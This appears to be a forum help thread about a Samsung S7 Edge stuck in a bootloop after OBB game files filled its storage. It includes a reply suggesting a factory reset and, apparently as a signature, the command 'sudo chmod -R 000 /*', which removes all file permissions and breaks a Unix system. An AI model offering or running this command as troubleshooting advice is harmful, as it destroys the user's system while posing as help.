Samsung S7 Edge bootlooping because of full storage - need storage access without booting

So I was almost at full storage (like 2 GBs were empty) and I transfered Apex's OBB files so I can manually install it (google play didn't let). While transfering from SD card phone started bootlooping and now I can't boot to Android because it immediately starts from that "Samsung" screen again. I somehow need to access my storage and delete that OBB file without modding if possible. Phone didn't have a lock so that should make things easier.

the only option I can think of is restoring factory settings which should also wipe your storage.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
